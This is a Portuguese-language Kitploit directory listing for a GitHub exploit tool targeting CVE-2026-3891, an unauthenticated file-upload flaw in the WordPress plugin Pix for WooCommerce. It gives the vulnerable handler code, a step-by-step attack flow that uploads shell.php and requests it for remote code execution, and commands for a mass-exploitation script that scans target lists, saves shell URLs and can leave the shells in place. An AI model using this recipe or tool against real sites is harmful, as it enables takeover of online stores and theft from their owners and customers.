Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/shinthink/cve-2026-3891
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix para WooCommerce Upload de Arquivo Não Autenticado através do parâmetro certificate_crt_path | CVSS 9.8

Ver Repositório
412há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-3891 — Pix for WooCommerce Upload de Arquivo não Autenticado RCE

Vazamento de Nonce → Upload certificate_crt_path → Execução de Código


Visão Geral

CVE-2026-3891 é uma vulnerabilidade crítica (CVSS 9.8) de upload arbitrário de arquivo não autenticado no plugin WordPress Pix for WooCommerce (por linknacional) versões ≤ 1.5.0.

O manipulador AJAX lkn_pix_for_woocommerce_c6_save_settings possui:

  1. Nenhuma verificação de capacidade — qualquer visitante não autenticado pode chamá-lo
  2. Nenhuma validação de tipo de arquivo — qualquer extensão de arquivo é aceita através do parâmetro certificate_crt_path
  3. Um nonce válido é obtido livremente através do endpoint lkn_pix_for_woocommerce_generate_nonce sem autenticação

Os arquivos enviados vão parar no diretório acessível pela web /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

Versões Afetadas

VersãoStatus
≤ 1.5.0Vulnerável
1.6.0+Corrigida

Descoberto por: Alexis Lafontaine via Wordfence (13 de março de 2026)


Mecanismo da Vulnerabilidade

Causa Raiz

root@kitploit:~
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

Fluxo de Ataque

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

Instalação

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

Uso

root@kitploit:~
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

Argumentos

root@kitploit:~
  -t, --target      Alvo único
  -f, --file        Lista de alvos
  -o, --output      Salvar URLs RCE
  --threads         Trabalhadores (padrão: 30)
  --no-cleanup      Deixar shells no alvo
  --debug           Mostrar cada requisição
  -v, --verbose     Saída detalhada

Aviso Legal

APENAS PARA FINS EDUCACIONAIS E DE TESTE AUTORIZADO. Os autores não assumem nenhuma responsabilidade por uso indevido.


Referências

RecursoLink
Comunicado do Wordfencewordfence.com
Entrada NVDCVE-2026-3891
PesquisadorAlexis Lafontaine

Não afiliado à linknacional ou Pix for WooCommerce.

Baixar ferramenta